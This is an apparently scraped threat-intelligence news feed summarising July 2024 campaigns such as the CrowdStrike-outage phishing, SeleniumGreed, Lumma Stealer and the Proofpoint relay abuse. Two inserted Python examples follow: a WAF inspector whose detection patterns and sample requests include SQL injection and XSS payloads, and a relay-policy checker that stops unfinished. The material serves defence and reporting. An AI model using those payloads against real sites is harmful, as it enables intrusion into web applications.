What's new around the internet


Src Date (GMT) Title Description Tags Stories Notes
PatchNow: ServiceNow Critical RCE Bugs Under Active Exploit
(direct link)
One threat actor claims to have already gathered email addresses and associated hashes from more than 110 remote IT management databases.
Threat
RiskIQ.webp 2024-07-29 20:27:03 Fake CrowdStrike fixes target companies with malware, data wipers (direct link)

## Snapshot

CrowdStrike's recent update glitch has been exploited by threat actors who use phishing emails to deliver data wipers and remote access tools. A campaign targeting BBVA bank customers distributed the Remcos RAT under the guise of a CrowdStrike Hotfix, while the pro-Iranian hacktivist group Handala used similar tactics against Israeli companies. These attacks, stemming from a logic error in a channel file update, have significantly impacted millions of Windows systems across various sectors.

## Description

AnyRun has identified the exploitation of CrowdStrike's update issue by threat actors, including phishing emails and malware campaigns targeting organizations with data wipers and remote access tools. Phishing emails have been observed attempting to take advantage of the disruption, with a malware campaign targeting BBVA bank customers offering a fake CrowdStrike Hotfix update that installs the Remcos RAT. The pro-Iranian hacktivist group Handala has also leveraged the situation by sending phishing emails that impersonate CrowdStrike to Israeli companies in order to distribute a data wiper. Additionally, attackers are distributing a data wiper under the pretense of delivering an update from CrowdStrike, decimating systems by overwriting files with zero bytes and reporting the result over Telegram. The defect in CrowdStrike's software update had a massive impact on Windows systems at numerous organizations, making it too good an opportunity for cybercriminals to pass up. The cause of the outage was identified as a channel file update to Windows hosts that triggered a logic error, leading to a crash. The impact on Windows systems at numerous organizations was significant, with millions of devices affected and disruptions across various sectors.

## Detections/Hunting Queries

Microsoft Defender Antivirus detects threat components as the following malware:

- [Backdoor:JS/Remcos](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/Remcos)
- [Trojan:Win32/Remcos](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Remcos)
- [PWS:Win32/Remcos](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=PWS:Win32/Remcos)
- [Backdoor:MSIL/Remcos](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:MSIL/Remcos)
- [Backdoor:Win32/Remcos](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/Remcos)
- [TrojanDownloader:AutoIt/Remcos](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:AutoIt/Remcos)
- [Trojan:Win32/HijackLoader](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/HijackLoader.AHJ!MTB&threatId=-2147058662)

## References

[Fake CrowdStrike fixes target companies with malware, data wipers.](https://www.bleepingcomputer.com/news/security/fake-crowdstrike-fixes-target-companies-with-malware-data-wipers/) Bleeping Computer (accessed 2024-07-22)
[Find Threats Exploiting CrowdStrike Outage with TI Lookup.](https://any.run/cybersecurity-blog/crowdstrike-outage-abuse/?utm_source=twitter&utm_medium=post&utm_campaign=outageabuse&utm_content=blog&utm_term=230724) Any Run (accessed 2024-07-24)
[HijackLoader Updates](https://security.microsoft.com/intel-explorer/articles/8c997d7c). Microsoft (accessed 2024-07-23)

## Copyright

**© Microsoft 2024**. All rights reserved. Reproduction or distribution of the content of this site, or any part thereof, without written permission of Microsoft is prohibited.
Malware Tool Threat
RiskIQ.webp 2024-07-29 20:15:06 SeleniumGreed: Threat actors exploit exposed Selenium Grid services for Cryptomining (direct link)

## Snapshot

Wiz researchers identified a threat campaign, referred to as "SeleniumGreed," exploiting a misconfiguration in Selenium Grid, a widely used web app testing framework, to deploy a modified XMRig tool for mining Monero cryptocurrency.

## Description

The attackers leverage the lack of default authentication in Selenium Grid to access app-testing instances, download files, and execute commands. By manipulating the Selenium WebDriver API, threat actors establish a reverse shell, drop a custom XMRig miner, and use compromised Selenium node workloads as intermediate command and control (C2) servers for subsequent infections and as mining pool proxies. The campaign targets older versions of Selenium but is also possible on more recent versions, potentially evading detection by targeting less maintained and monitored instances.

## Additional Analysis

[XMRig](https://www.checkpoint.com/cyber-hub/threat-prevention/what-is-malware/xmrig-malware/) is popular open-source software designed for mining cryptocurrencies, particularly Monero (XMR). Developed in C++, XMRig is efficient and versatile, supporting various algorithms and mining pools and running on multiple platforms including Windows, Linux, and macOS. However, it has been widely misused by cybercriminals who deploy it through malware to hijack the computing resources of unsuspecting victims, a practice known as cryptojacking. This unauthorized use of systems significantly degrades performance, increases energy consumption, and can cause hardware damage over time. Due to its frequent abuse in malicious campaigns, XMRig has become a focal point in discussions about cybersecurity threats related to resource hijacking and cryptomining.

## References

[SeleniumGreed: Threat actors exploit exposed Selenium Grid services for Cryptomining](https://www.wiz.io/blog/seleniumgreed-cryptomining-exploit-attack-flow-remediation-steps). Wiz (accessed 2024-07-29)
[XMRig Malware](https://www.checkpoint.com/cyber-hub/threat-prevention/what-is-malware/xmrig-malware/). Check Point (accessed 2024-07-29)
Malware Tool Threat
RiskIQ.webp 2024-07-29 20:07:18 Lumma Stealer Packed with CypherIt Distributed Using Falcon Sensor Update Phishing Lure (direct link)

## Snapshot

CrowdStrike Intelligence identified a phishing domain that impersonates CrowdStrike and delivers malicious ZIP and RAR files which ultimately execute Lumma Stealer packed with CypherIt. Read more about [Lumma Stealer here.](https://security.microsoft.com/intel-profiles/33933578825488511c30b0728dd3c4f8b5ca20e41c285a56f796eb39f57531ad)

## Description

The campaign is likely linked to a June 2024 Lumma Stealer distribution campaign in which a threat actor leveraged advanced social-engineering techniques, such as spam floods and voice phishing (vishing), to deliver malicious binaries. The MSI loader displays a decoy installation and, upon execution, extracts and executes a self-extracting RAR (SFX) file, plenrco.exe, with the command line plenrco.exe -pqwerty2023 -s1. This extracts another RAR SFX archive stored in the PE overlay of plenrco.exe. The RAR archive contains a Nullsoft Scriptable Install System (NSIS) installer with the filename SymposiumTaiwan.exe. The NSIS installer contains fragments of a legitimate AutoIt executable and a compiled AutoIt script. The NSIS installer also contains a batch script loader named Open.cmd, which includes junk code to hide the actual functionality. The final payload is RC4-encrypted and LZNT1-compressed, resulting in a Lumma Stealer sample. The decompiled AutoIt script is a CypherIt loader that is heavily obfuscated to hinder static analysis. The loader implements string obfuscation and terminates if certain checks are met, such as specific hostnames or antivirus processes running. The AutoIt loader contains two shellcodes, for 32-bit and 64-bit systems, that implement the RC4 algorithm to decrypt the final payload, which is also hardcoded within the AutoIt loader.

The final payload is a Lumma Stealer executable that contacts the command-and-control (C2) server included in the IOCs at the time of analysis. Additionally, the same C2 domain identified in this activity was observed in a recent widespread opportunistic spam flood and voice phishing (vishing) campaign in June 2024. Based on the shared infrastructure between the campaigns and the apparent targeting of corporate networks, CrowdStrike Intelligence assesses with moderate confidence that the activity is likely attributable to the same unnamed threat actor.

## Recommendations

Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.

- Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
- Enable [network protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide?ocid=magicti_ta_learndoc).
- Run endpoint detection and response [(EDR) in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Configure [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.

Spam Tool Threat
Proofpoint Email Routing Flaw Exploited to Send Millions of Spoofed Phishing Emails
(direct link)
An unknown threat actor has been linked to a massive scam campaign that exploited an email routing misconfiguration in email security vendor Proofpoint's defenses to send millions of messages spoofing various legitimate companies. "These emails echoed from official Proofpoint email relays with authenticated SPF and DKIM signatures, thus bypassing major security protections - all to deceive
Threat
RiskIQ.webp 2024-07-29 18:01:57 Malicious Inauthentic Falcon Crash Reporter Installer Distributed to German Entity via Spearphishing Website (direct link)

#### Targeted geolocations

- Germany

## Snapshot

CrowdStrike Intelligence identified a spearphishing attempt delivering a fake CrowdStrike Crash Reporter installer through a website impersonating a German entity.

## Description

The site was registered on July 20, 2024, shortly after the CrowdStrike Falcon sensor update issue, and used JavaScript disguised as jQuery to download and deobfuscate the installer. This installer, carrying CrowdStrike branding and localized in German, required a password for installation. The phishing page linked to a ZIP file containing a malicious InnoSetup installer and displayed CrowdStrike branding to appear legitimate. The JavaScript hid its malicious code inside genuine jQuery code to evade detection. When the user clicked the download button, the site executed a function to download a disguised portable executable file. The installer, which appeared on July 20, 2024, had a timestamp aligned with the sensor update, suggesting the use of timestamping to avoid detection. The installer prompted users to enter a specific "backend server" password, probably known only to the targets, indicating a highly targeted attack. CrowdStrike Intelligence assessed with high confidence that the attackers focused on German-speaking customers affected by the Falcon sensor issue and used advanced anti-forensic techniques, including registering subdomains under a legitimate registrar and the content of the installers themselves.

## Additional Analysis

Cyber threat actors exploit current events to carry out malicious activity because such situations often create confusion and urgency, making individuals and organizations more vulnerable to deception. They capitalize on the heightened interest and attention surrounding these events to increase the likelihood that their phishing attempts and other attacks succeed. By aligning their malicious campaigns with well-known incidents or updates, threat actors can more easily mask their intentions and lure victims into unwittingly compromising their security. This phishing campaign targeting German-speaking customers is the latest example of cyberattacks exploiting the chaos of the CrowdStrike Falcon update. Earlier reports of malicious activity during the outage include [data wipers distributed by the pro-Iranian hacktivist group Handala](https://www.bleepingcomputer.com/news/security/fake-crowdstrike-fixes-target-companies-with-malware-data-wipers/), [HijackLoader dropping Remcos Remote Access Trojan](https://x.com/anyrun_app/status/1814567576858427410) disguised as a CrowdStrike hotfix, and the information stealer [Daolpu](https://www.crowdstrike.com/blog/fake-recovery-manual-used-to-deliver-unidentified-stealer/) spread through phishing emails posing as a recovery tool.

## Recommendations

Microsoft recommends the following mitigations to reduce the impact of this threat.

- Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the majority of new and unknown threats.
- Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=Magicti_TA_LearnDoc) so that Microsoft Defender for Endpoint

Ransomware Malware Tool Threat
29th July – Threat Intelligence Report
(direct link)
For the latest discoveries in cyber research for the week of 29th July, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

The Superior Court of Los Angeles was forced to shut down its network following a ransomware attack. The court, the largest in the United States, has closed all of its 36 courthouse […]
Ransomware Threat
Taking action: how to combat the financial repercussions of a cyber incident
(direct link)
Paying hackers not to release the data they have stolen from you is not the best way to manage the financial repercussions of a cyber-attack. Nor is trying to hide the attack from the authorities… Even the most vigilant companies can't escape the possibility of having to handle a cyber threat - and the cost of […] The post Taking action: how to combat the financial repercussions of a cyber incident first appeared on IT Security Guru.
Threat
UNC4393 Goes Gently into the SILENTNIGHT
(direct link)
Written by: Josh Murchie, Ashley Pearson, Joseph Pisano, Jake Nicastro, Joshua Shilko, Raymond Leong

Overview

In mid-2022, Mandiant's Managed Defense detected multiple intrusions involving QAKBOT, leading to the deployment of BEACON coupled with other pre-ransomware indicators. This marked Mandiant's initial identification of UNC4393, the primary user of BASTA ransomware. Mandiant has responded to over 40 separate UNC4393 intrusions across 20 different industry verticals. While healthcare organizations have not traditionally been a focus for UNC4393, several breaches in the industry this year indicate a possible expansion of their interests. However, this represents only a fraction of the cluster's victims, with the Black Basta data leak site purporting over 500 victims since inception.

Over the course of this blog post, Mandiant will detail the evolution of UNC4393's operational tactics and malware usage throughout its active lifespan, with a focus on the period following the QAKBOT botnet takedown. We will highlight the cluster's transition from readily available tools to custom malware development as well as its evolving reliance on access brokers and diversification of initial access techniques.

Figure 1: UNC4393 intrusion lifecycle

Attribution and Targeting

UNC4393 is a financially motivated threat cluster, and the primary user of BASTA ransomware, tracked since mid-2022 but likely active since early 2022 based on activity on the BASTA DLS. The group has overwhelmingly leveraged initial access gained via UNC2633 and UNC2500 QAKBOT botnet infections to deploy BASTA ransomware. QAKBOT is typically distributed via phishing emails containing malicious links or attachments. In some cases, HTML smuggling has also been used to distribute ZIP files containing IMG files that house LNK files and QAKBOT payloads. Mandiant suspects BASTA operators maintain a private or small, closed-invitation affiliate model whereby only trusted third-party actors are provided with use of the BASTA encryptor.

Unlike traditional ransomware-as-a-service (RaaS), BASTA is not publicly marketed and its operators do not appear to actively recruit affiliates to deploy the ransomware. Instead, they focus on acquiring initial access via partnerships or purchases in underground communities. This deviates from traditional RaaS models, which focus on the ransomware development and related services such as the data leak site (DLS) that are provided to affiliates in exchange for directly distributing the ransomware. While UNC4393 is the only currently active threat cluster deploying BASTA that Mandiant tracks, we cannot rule out the possibility that other, vetted threat actors may also be given access to the encrypter. The hundreds of BASTA ransomware victims claimed on the DLS appear credible due to UNC4393's rapid operational tempo. With a median time to ransom of approximately 42 hours, UNC4393 has demonstrated p
Ransomware Malware Tool Threat Prediction Medical Cloud
'Stargazer Goblin' Creates 3,000 Fake GitHub Accounts for Malware Spread
(direct link)
A threat actor known as Stargazer Goblin has set up a network of inauthentic GitHub accounts to fuel a Distribution-as-a-Service (DaaS) that propagates a variety of information-stealing malware, netting them $100,000 in illicit profits over the past year. The network, which comprises over 3,000 accounts on the cloud-based code hosting platform, spans thousands of repositories that are used to
Malware Threat
globalsecuritymag.webp 2024-07-29 12:20:53 To counter serious information security threats, Apacer provides solutions for enterprise system recovery and data security (direct link) With the rapid development of AI applications across various fields, enterprises rely more and more on data. Information security questions, such as the measures taken to ensure that data is not lost or used inappropriately, have become crucial. Apacer fully understands how irreplaceable enterprise data can be. Through continuous improvement of its proprietary backup and restore technology over the years, Apacer (8271) strives to meet the many needs generated by diverse industrial applications. - Products Threat
What Every Business Needs to Know About Ransomware
(direct link)
Today's businesses rely heavily on technology to streamline operations, enhance productivity, and connect with customers. However, this dependency has also opened the door to a growing threat: ransomware attacks. By 2031, the cost of ransomware attacks is estimated to reach $265 billion (USD) annually. The rapid growth of ransomware attacks has made this cyber threat [...]
Ransomware Threat
RiskIQ.webp 2024-07-29 10:58:35 Weekly OSINT Highlights, 29 July 2024 (direct link)

## Snapshot

Key trends from last week's OSINT reporting include novel malware, such as Flame Stealer and FrostyGoop, the compromise of legitimate platforms like Discord and GitHub, and state-sponsored threat actors conducting espionage and destructive attacks. Notable threat actors, including Russian groups, Transparent Tribe, FIN7, and DPRK's Andariel, are targeting a wide range of sectors from defense and industrial control systems to financial institutions and research entities. These attacks exploit various vulnerabilities and employ advanced evasion techniques, leveraging both traditional methods and emerging technologies like AI-generated scripts and RDGAs, underscoring the evolving and persistent nature of the cyber threat landscape.

## Description

1. [Widespread Adoption of Flame Stealer](https://sip.security.microsoft.com/intel-explorer/articles/f610f18e): Cyfirma reports Flame Stealer's use in stealing Discord tokens and browser credentials. Distributed via Discord and Telegram, this malware targets various platforms, utilizing evasion techniques like DLL side-loading and data exfiltration through Discord webhooks.
2. [ExelaStealer Delivered via PowerShell](https://sip.security.microsoft.com/intel-explorer/articles/5b4a34b0): The SANS Technology Institute Internet Storm Center reported a threat involving ExelaStealer, downloaded from a Russian IP address using a PowerShell script. The script downloads two PE files: a self-extracting RAR archive communicating with "solararbx[.]online" and "service.exe," the ExelaStealer malware. ExelaStealer, developed in Python, uses Discord for C2, conducting reconnaissance and gathering system and user details. Comments in Russian in the script and the origin of the IP address suggest a Russian origin.
3. [FrostyGoop Disrupts Heating in Ukraine](https://sip.security.microsoft.com/intel-explorer/articles/cf8f8199): Dragos identified FrostyGoop malware in a cyberattack disrupting heating in Lviv, Ukraine. Linked to Russian groups, the ICS-specific malware exploits vulnerabilities in industrial control systems and communicates using the Modbus TCP protocol.
4. [Rhysida Ransomware Attack on Private School](https://sip.security.microsoft.com/intel-explorer/articles/4cf89ad3): ThreatDown by Malwarebytes identified a Rhysida ransomware attack using a new variant of the Oyster backdoor. The attackers used SEO-poisoned search results to distribute malicious installers masquerading as legitimate software, deploying the Oyster backdoor.
5. [LLMs Used to Generate Malicious Code](https://sip.security.microsoft.com/intel-explorer/articles/96b66de0): Symantec highlights cyberattacks using Large Language Models (LLMs) to generate malware code. Phishing campaigns utilize LLM-generated PowerShell scripts to download payloads like Rhadamanthys and LokiBot, stressing the need for advanced detection against AI-facilitated attacks.
6. [Stargazers Ghost Network Distributes Malware](https://sip.security.microsoft.com/intel-explorer/articles/62a3aa28): Check Point Research uncovers a network of GitHub accounts distributing malware via phishing repositories. The Stargazer Goblin group's DaaS operation leverages over 3,000 accounts to spread malware such as Atlantida Stealer and RedLine, targeting both general users and other threat actors.
7. [Crimson RAT Targets Indian Election Results](https://sip.security.microsoft.com/intel-explorer/articles/dfae4887): K7 Labs identified Crimson RAT malware delivered through documents disguised as "Indian Election Results." Transparent Tribe APT, believed to be from Pakistan, targets Indian diplomatic and defense entities using macro-embedded documents to steal credentials.
8. [AsyncRAT Distributed via Weaponized eBooks](https://sip.security.microsoft.com/intel-explorer/articles/e84ee11d): ASEC discovered AsyncRAT malware distributed through weaponized eBooks. Hidden PowerShell scripts within these eBooks trigger the AsyncRAT payload, which uses obfuscation and anti-detection techniques to exfiltrate data.

Ransomware Data Breach Spam Malware Tool Vulnerability Threat Legislation Mobile Industrial Medical APT 28 APT 36
zataz.webp 2024-07-29 10:07:25 Capgemini hacked by one of its own employees (direct link) Insider threat: the hacker of the Capgemini company was none other than one of its employees....
Threat
Mandrake spyware sneaks onto Google Play again, flying under the radar for two years
(direct link)
Mandrake spyware threat actors resume attacks with new functionality targeting Android devices while being publicly available on Google Play.
Threat Mobile
Why You Need a Web Application Firewall in 2024
(direct link)
The content of this post is solely the responsibility of the author. LevelBlue does not adopt or endorse any of the views, positions, or information provided by the author in this article.

Over the last decade, web applications have become integral to everyday life. This includes business and personal activities, facilitating everything from banking and transactions to marketing and social networking. This rise in popularity has made web applications a prime target for cybercriminals. According to Verizon's 2024 Data Breach Investigations Report, nearly 40% of cybersecurity incidents result from web application vulnerabilities. Businesses relying on these applications for everyday operations must implement robust security measures to ensure their app stack is resilient to threats and capable of maintaining uninterrupted service. One of the most effective tools for safeguarding web applications is a web application firewall (WAF), which provides critical protection against a wide range of cyber threats.

Most Common Threats to Web App Security

Before we dive into how web application firewalls protect our web assets, let's look at the most pressing security threats facing web applications in 2024. Stolen credentials are top of mind, as millions are available for sale on the dark web. One of the most significant cyberattacks of the year involved compromised credentials for a third-party application in an attack on UnitedHealth, which jeopardized the data of one-third of Americans. Attackers moved through the victim's systems for nine days before striking, highlighting how important real-time monitoring capabilities are for detecting suspicious behavior.

Zero-day exploits are also a common vector attackers have used in recent years to breach web applications. A zero-day vulnerability is unknown to the application vendor and the public at the time it is discovered and exploited by attackers. They can be quite dangerous if they're not identified and patched quickly. In 2023, there were 97 reported zero-day vulnerabilities, an increase of more than 50% from the year before.

Additionally, as web applications increasingly rely on each other to provide maximum functionality to the end user, API-related attacks have also become prevalent. App integrations must be executed correctly with strong authentication and authorization mechanisms. Input validation is also required to prevent injection attacks.

Modern WAF Solutions Are Essential to Improving Security

A web application firewall is a hardware or software-based solution used to monitor and filter HTTP traffic between a web application and the internet. WAFs provide two essential security features: traffic filtering and real-time monitoring. WAFs use rule-based filters to inspect HTTP requests and responses. These filters detect and block a wide spectrum of attacks, including SQL injection, cross-site scripting (XSS), and cross-site request forgery (CSRF). By analyzing traffic in real time, a WAF solution can identify and mitigate threats as they occur, foiling attacks before
Data Breach Tool Vulnerability Threat
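The rule-based inspection the article describes, as an added example that is not part of the LevelBlue post or any product's rule set: a small anomaly-scoring request inspector in Python. Everything in it (the rules, their weights, the block threshold, the header list and the four sample requests) is an assumption made for illustration.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qsl, unquote_plus


@dataclass
class Request:
    """A parsed HTTP request (constructed for this example)."""
    method: str
    path: str
    query: str = ""
    body: str = ""
    headers: dict = field(default_factory=dict)


# (rule id, pattern, weight, attack class). Weights are summed per request and
# compared with THRESHOLD: anomaly scoring lets the filter keep low-confidence
# signatures without blocking on any single one of them.
RULES = [
    ("sqli-union", re.compile(r"\bunion\s+(all\s+)?select\b", re.I), 5, "SQLi"),
    ("sqli-tautology", re.compile(r"'\s*or\s+'?\d*'?\s*=\s*'?\d*", re.I), 5, "SQLi"),
    ("sqli-comment", re.compile(r"(--|/\*)\s*$"), 3, "SQLi"),
    ("xss-script", re.compile(r"<\s*script[\s>]", re.I), 5, "XSS"),
    ("xss-event", re.compile(r"\bon[a-z]+\s*=", re.I), 3, "XSS"),
    ("xss-js-uri", re.compile(r"javascript\s*:", re.I), 4, "XSS"),
]
THRESHOLD = 5


def _decode(s: str) -> str:
    # Decode twice so that %2527 (a double-encoded apostrophe) is inspected as "'".
    return unquote_plus(unquote_plus(s))


def _inspectable_values(req: Request):
    """Yield every decoded string a rule should see: the path, each query and
    body parameter value, and the headers attackers most often abuse."""
    yield _decode(req.path)
    for raw in (req.query, req.body):
        for _name, value in parse_qsl(raw, keep_blank_values=True):
            yield _decode(value)
    for name in ("User-Agent", "Referer", "Cookie"):
        if name in req.headers:
            yield _decode(req.headers[name])


def inspect(req: Request):
    """Return (blocked, score, matched rule ids) for one request."""
    score, hits = 0, []
    for value in _inspectable_values(req):
        for rule_id, pattern, weight, _cls in RULES:
            if rule_id not in hits and pattern.search(value):
                hits.append(rule_id)
                score += weight
    return score >= THRESHOLD, score, hits


# Constructed sample traffic: one benign search and three attack attempts.
SAMPLES = {
    "benign": Request("GET", "/search", query="q=union+station+hotels"),
    "sqli-tautology": Request("GET", "/items", query="id=1'+OR+'1'='1"),
    "xss-body": Request("POST", "/comment", body="text=%3Cscript%3Ealert(1)%3C%2Fscript%3E"),
    # Double URL encoding (%2527 -> %27 -> ') is a classic WAF evasion attempt.
    "double-encoded": Request("GET", "/items", query="id=1%2527+union%2520select"),
}


def run_samples():
    """Run every sample through the inspector; returns {name: (blocked, score, hits)}."""
    return {name: inspect(req) for name, req in SAMPLES.items()}


if __name__ == "__main__":
    for name, (blocked, score, hits) in run_samples().items():
        print(f"{name:15} blocked={blocked!s:5} score={score:2} rules={hits}")
```

Two details matter more than the signatures themselves. Parameter values are decoded twice, so a double-encoded payload is inspected as the apostrophe it becomes, which a single-decode filter misses; and each rule carries a weight that is summed per request, so a weak indicator such as an `on...=` attribute does not block on its own, which is how production engines such as OWASP CRS limit false positives. The `union station hotels` search passes only because the union rule insists on `select` directly after the keyword; loosen that and the same request is blocked, which is why WAF rules are tuned per application rather than switched on wholesale, and why a WAF is a compensating control in front of the application rather than a substitute for fixing the injection flaw itself.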
ProofPoint.webp 2024-07-29 06:00:58 From Reactive to Proactive: Identify Risky Users in Real Time to Stop Insider Threats
(direct link)
Insider threats can come from anywhere at any time. Although there are well-known insider threat indicators and trigger events, one of the most challenging aspects of containing insider threats is identifying a user who may cause harm to the business, intentionally or not. This uncertainty can be daunting. And it is one of the reasons that insider threats are a leading challenge for CISOs globally.

Insider threat investigations are typically reactive. Cybersecurity administrators focus on risky users like leavers, employees on a performance improvement plan, or contractors once they learn about their potential risk to the company. This is a valid way to manage known risks. But how can a business manage unknown risks? Proofpoint Insider Threat Management (ITM) has capabilities to help security teams do exactly that with dynamic policies on the endpoint.

Reactive monitoring poses challenges

The riskiest users in a business tend to fall into several categories. They include users who:
- Exhibit risky behavior, like downloading a high volume of sensitive files
- Belong to a predetermined risky user group; some examples include departing employees, privileged users with access to sensitive data and systems, and Very Attacked People™
- Have a high risk score based on a number of indicators

Security teams typically build manual policies to monitor these users for unusual or risky behavior. When a user's activity violates corporate policy, their activity is detected by and visible to security teams. Security teams can continue to monitor the user and apply prevention controls when needed. This is a sound approach. But it relies on identifying the risky user ahead of time, monitoring their behavior and making manual changes to policies. Teams that have no way to identify risky users may decide to monitor all users as "risky." However, collecting data on all users is inefficient. It burdens the security team with too many alerts and false positives.

Another challenge for security teams is protecting users' privacy to meet compliance requirements. Capturing visuals like screenshots in an insider threat investigation is crucial. It can provide irrefutable evidence that can be used to prove a user's intentions. However, collecting such information all the time poses privacy concerns, especially in regions with strict privacy regulations. Balancing security with privacy controls requires that data collection occur on a need-to-know basis.

Identify risky users with dynamic policies

Proofpoint ITM alleviates the challenge of knowing who your riskiest users are at all times. With dynamic policies for the endpoint, security teams do not need to write policies based on specific users or groups. Instead, they can dynamically and flexibly change a user's monitoring policy in real time if a user triggers an alert. Dynamic policies allow security teams to do the following:
- Change the endpoint agent policy from metadata-only to screenshot mode for a specified time frame before and after an alert
- Capture screenshots only when behavior is risky and an alert is generated, thereby protecting the privacy of the user
- Define when visibility and control policies are scaled up or down on the endpoint

User scenario: a departing employee

Let's walk through an example of a departing employee. Evan is a researcher at a global life sciences company. She has access to sensitive vaccine data due to the nature of her role. Evan is being monitored as a low-risk user. That means metadata is being captured when she moves data, such as uploading a PPT file with sensitive data to a partner's website or uploading a strategy document to the company's cloud sync folder. However, Evan's behavior, such as tampering with the Windows registry or any security controls, or downloading an unapproved application, is not captured. Evan is goin
Threat Cloud
ProofPoint.webp 2024-07-29 01:00:00 Scammer Abuses Microsoft 365 Tenants, Relaying Through Proofpoint Servers to Deliver Spam Campaigns
(direct link)
Key Findings
- In March, Proofpoint researchers identified spam campaigns being relayed through a small number of Proofpoint customers' email infrastructure by sending spam from Microsoft 365 tenants
- All analyses indicate this activity was conducted by one spam actor, whose activity we do not attribute to a known entity
- The root cause is a modifiable email routing configuration feature on Proofpoint servers that allows relay of organizations' outbound messages from Microsoft 365 tenants, but without specifying which M365 tenants to allow
- To resolve the issue, Proofpoint implemented a streamlined administrative interface for customers to specify which M365 tenants are allowed to relay, with all other M365 tenants denied by default
- Any email infrastructure that offers this email routing configuration feature can be abused by spammers
- Proofpoint Essentials customers are not affected, as configuration settings are already set that prevent unauthorized relay abuse
- This issue did not expose any Proofpoint customer data, and no customer experienced any data loss as a result
- We are sharing what we know about these campaigns to help others mitigate this issue and prevent further unauthorized abuse, as it is not unique to Proofpoint

Abusing an Outbound Email Relay Configuration to Conduct Spam Campaigns

In March 2024, Proofpoint observed spam campaigns being relayed from Microsoft 365 tenants through several Proofpoint enterprise customers' email infrastructures, targeting users of free email providers such as Yahoo, Gmail, and GMX. The commonality shared between all the customers whose email infrastructures were being abused was a modifiable configuration setting that allowed outbound messages to be relayed from Microsoft 365. Spammers can therefore abuse any email infrastructure that allows messages to be relayed from email hosting services through their infrastructure.

This specific email routing configuration abused by the spammer allowed outbound messages to be sent from a customer's Microsoft 365 tenant for relay through their infrastructure, but it did not limit the Microsoft tenants allowed to relay. The spammer, whose activity we do not attribute to a known entity, controlled Microsoft 365 tenants that used random strings of letters and numbers, such as 23gdfs56gsd.onmicrosoft.com, for some of the spam messages. Some of the spam made no attempt to disguise the sender address and used the oddly named Microsoft tenant names as the sending domain. Some of the spam used the onmicrosoft.com tenant names in the "from" field, and other spam messages spoofed the sender email, not all of which were successfully delivered. Interestingly, while the spammer tried this against several Proofpoint infrastructures, some accepted the messages for relay while others rejected the messages. The spammer spoofed the RFC822 "from" header but could not spoof the RFC821 envelope sender address. The spammer used a rotating series of leased virtual private servers (VPS) from several providers, using many different IP addresses to initiate quick bursts of thousands of messages at a time from their SMTP servers, sent to Microsoft 365 to be relayed to Proofpoint-hosted customer servers. Microsoft 365 accepted these spoofed messages and sent them to these customers' email infrastructures to be relayed. When customer domains were spoofed while relaying through the matching customer's email infrastructure, DKIM signing was also applied as the messages transited through the Proofpoint infrastructure, making the spam messages more deliverable. As many of the tenants being abused by the spammer are still active as of writing, we have implemented several measures to prevent unauthorized relay through Proofpoint servers to keep our customers protected.

Taking Action to Notify and Protect Our Customers

Proofpoint quickly mobilized a cross-functional task force to identify and contact all customers that had an at-risk configuration to help them change their configuration settings, prioritizing those whose infrastructures we
Spam Threat Technical Yahoo
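To make the misconfiguration concrete, here is an added example in Python, written for this page rather than taken from Proofpoint, of the decision an outbound relay makes when Microsoft 365 hands it a message. It contrasts a policy that accepts any tenant (the abused configuration) with a tenant allow list plus an envelope/header alignment check. The header names, tenant domains and sample messages are assumptions made for the example; in particular, the sending tenant is assumed to be readable from the X-OriginatorOrg header Exchange Online adds, and the address ranges are a subset of Microsoft's published Exchange Online list that a real relay would load from the current list rather than hard-code.

```python
import ipaddress
from dataclasses import dataclass, field

# Subset of the Exchange Online outbound ranges Microsoft publishes (assumed
# current; load the published list in production instead of hard-coding it).
M365_NETS = [ipaddress.ip_network(n) for n in
             ("52.100.0.0/14", "40.92.0.0/15", "40.107.0.0/16", "104.47.0.0/17")]


@dataclass
class Message:
    """One relay attempt as seen by the customer's outbound gateway."""
    client_ip: str        # connecting MTA
    mail_from: str        # RFC 5321 envelope sender (MAIL FROM), not forgeable by the spammer
    header_from: str      # RFC 5322 From: header, which the spammer could forge
    originator_org: str   # sending tenant; assumed to come from X-OriginatorOrg


@dataclass
class RelayPolicy:
    customer_domains: set
    allowed_tenants: set = field(default_factory=set)
    allow_any_tenant: bool = False    # True reproduces the abused configuration
    require_alignment: bool = False   # From: on a customer domain must match the MAIL FROM domain


def _domain(addr: str) -> str:
    return addr.rsplit("@", 1)[-1].lower()


def decide(msg: Message, policy: RelayPolicy) -> str:
    """Return 'accept' or 'reject: <reason>' for one relay attempt."""
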